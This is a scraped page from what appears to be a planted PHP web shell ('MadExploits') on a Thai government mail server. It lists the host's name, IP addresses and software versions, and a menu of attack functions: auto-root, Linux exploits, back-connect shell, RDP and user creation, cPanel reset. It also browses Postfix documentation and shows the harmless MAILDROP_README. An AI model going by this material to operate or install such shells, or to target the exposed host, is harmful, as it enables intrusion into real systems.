Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
postfix-2.6.6 /
README_FILES /
[ HOME SHELL ]
Name
Size
Permission
Action
AAAREADME
2.7
KB
-rw-r--r--
ADDRESS_CLASS_README
9.33
KB
-rw-r--r--
ADDRESS_REWRITING_README
42.68
KB
-rw-r--r--
ADDRESS_VERIFICATION_README
19.46
KB
-rw-r--r--
BACKSCATTER_README
12.3
KB
-rw-r--r--
BASIC_CONFIGURATION_README
20.73
KB
-rw-r--r--
BUILTIN_FILTER_README
13.94
KB
-rw-r--r--
CDB_README
2.69
KB
-rw-r--r--
CONNECTION_CACHE_README
8.96
KB
-rw-r--r--
CONTENT_INSPECTION_README
3.29
KB
-rw-r--r--
DATABASE_README
13.25
KB
-rw-r--r--
DB_README
6.9
KB
-rw-r--r--
DEBUG_README
17.71
KB
-rw-r--r--
DSN_README
4.33
KB
-rw-r--r--
ETRN_README
11.4
KB
-rw-r--r--
FILTER_README
27.04
KB
-rw-r--r--
INSTALL
32.72
KB
-rw-r--r--
IPV6_README
11.73
KB
-rw-r--r--
LDAP_README
19.83
KB
-rw-r--r--
LINUX_README
1.64
KB
-rw-r--r--
LOCAL_RECIPIENT_README
5.65
KB
-rw-r--r--
MAILDROP_README
5.16
KB
-rw-r--r--
MILTER_README
36.6
KB
-rw-r--r--
MULTI_INSTANCE_README
42.4
KB
-rw-r--r--
MYSQL_README
4.31
KB
-rw-r--r--
NFS_README
4.73
KB
-rw-r--r--
OVERVIEW
18.57
KB
-rw-r--r--
PACKAGE_README
5.45
KB
-rw-r--r--
PCRE_README
2.87
KB
-rw-r--r--
PGSQL_README
4.4
KB
-rw-r--r--
QSHAPE_README
36.13
KB
-rw-r--r--
RELEASE_NOTES
12.37
KB
-rw-r--r--
RESTRICTION_CLASS_README
6.71
KB
-rw-r--r--
SASL_README
23.29
KB
-rw-r--r--
SCHEDULER_README
65.06
KB
-rw-r--r--
SMTPD_ACCESS_README
15.41
KB
-rw-r--r--
SMTPD_POLICY_README
19.37
KB
-rw-r--r--
SMTPD_PROXY_README
10.47
KB
-rw-r--r--
STANDARD_CONFIGURATION_README
25.24
KB
-rw-r--r--
STRESS_README
19.62
KB
-rw-r--r--
TLS_LEGACY_README
51.46
KB
-rw-r--r--
TLS_README
96.1
KB
-rw-r--r--
TUNING_README
23.76
KB
-rw-r--r--
ULTRIX_README
1.96
KB
-rw-r--r--
UUCP_README
5.14
KB
-rw-r--r--
VERP_README
7
KB
-rw-r--r--
VIRTUAL_README
23.29
KB
-rw-r--r--
XCLIENT_README
9.39
KB
-rw-r--r--
XFORWARD_README
8.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MAILDROP_README
PPoossttffiixx ++ MMaaiillddrroopp HHoowwttoo ------------------------------------------------------------------------------- IInnttrroodduuccttiioonn This document discusses various options to plug the maildrop delivery agent into Postfix: * Direct delivery without the local delivery agent * Indirect delivery via the local delivery agent * Credits DDiirreecctt ddeelliivveerryy wwiitthhoouutt tthhee llooccaall ddeelliivveerryy aaggeenntt Postfix can be configured to deliver mail directly to maildrop, without using the local(8) delivery agent as an intermediate. This means that you do not get local aliases(5) expansion or $HOME/.forward file processing. You would typically do this for hosted domains with recipients that don't have UNIX home directories. The following example shows how to use maildrop for some.domain and for someother.domain. The example comes in two parts. Part 1 describes changes to the main.cf file: 1 /etc/postfix/main.cf: 2 maildrop_destination_recipient_limit = 1 3 virtual_mailbox_domains = some.domain someother.domain 4 virtual_transport = maildrop 5 virtual_mailbox_maps = hash:/etc/postfix/virtual_mailbox 6 virtual_alias_maps = hash:/etc/postfix/virtual_alias 7 8 /etc/postfix/virtual_mailbox: 9 user1@some.domain ...text here does not matter... 10 user2@some.domain ...text here does not matter... 11 user3@someother.domain ...text here does not matter... 12 13 /etc/postfix/virtual_alias: 14 postmaster@some.domain postmaster 15 postmaster@someother.domain postmaster * Line 2 is needed so that Postfix will provide one recipient at a time to the maildrop delivery agent. * Line 3 informs Postfix that some.domain and someother.domain are so-called virtual mailbox domains. Instead of listing the names in main.cf you can also list them in a file; see the virtual_mailbox_domains documentation for details. * Line 4 specifies that mail for some.domain and someother.domain should be delivered by the maildrop delivery agent. * Lines 5 and 8-11 specify what recipients the Postfix SMTP server should receive mail for. This prevents the mail queue from becoming clogged with undeliverable messages. Specify an empty value ("virtual_mailbox_maps =") to disable this feature. * Lines 6 and 13-15 redirect mail for postmaster to the local postmaster. RFC 821 requires that every domain has a postmaster address. The vmail userid as used below is the user that maildrop should run as. This would be the owner of the virtual mailboxes if they all have the same owner. If maildrop is suid (see maildrop documentation), then maildrop will change to the appropriate owner to deliver the mail. Note: Do not use the postfix user as the maildrop user. Part 2 describes changes to the master.cf file: /etc/postfix/master.cf: maildrop unix - n n - - pipe flags=ODRhu user=vmail argv=/path/to/maildrop -d ${recipient} The pipe(8) manual page gives a detailed description of the above command line arguments, and more. If you want to support user+extension@domain style addresses, use the following instead: /etc/postfix/master.cf: maildrop unix - n n - - pipe flags=ODRhu user=vmail argv=/path/to/maildrop -d ${user}@${nexthop} ${extension} ${recipient} ${user} ${nexthop} The mail is delivered to ${user}@${nexthop} (match key for maildrop userdb lookup). The ${extension} and the other address components are available to maildrop rules as $1, $2, $3, ... and can be omitted from master.cf or ignored by maildrop when not needed. IInnddiirreecctt ddeelliivveerryy vviiaa tthhee llooccaall ddeelliivveerryy aaggeenntt Postfix can be configured to deliver mail to maildrop via the local delivery agent. This is slightly less efficient than the "direct" approach discussed above, but gives you the convenience of local aliases(5) expansion and $HOME/.forward file processing. You would typically use this for domains that are listed in mydestination and that have users with a UNIX system account. To configure maildrop delivery for all UNIX system accounts: /etc/postfix/main.cf: mailbox_command = /path/to/maildrop -d ${USER} Note: ${USER} is spelled in upper case. To enable maildrop delivery for specific users only, you can use the Postfix local(8) delivery agent's mailbox_command_maps feature: /etc/postfix/main.cf: mailbox_command_maps = hash:/etc/postfix/mailbox_commands /etc/postfix/mailbox_commands: you /path/to/maildrop -d ${USER} Maildrop delivery for specific users is also possible by invoking it from the user's $HOME/.forward file: /home/you/.forward: "|/path/to/maildrop -d ${USER}" CCrreeddiittss * The original text was kindly provided by Russell Mosemann. * Victor Duchovni provided tips for supporting user+foo@domain addresses. * Tonni Earnshaw contributed text about delivery via the local(8) delivery agent.
Close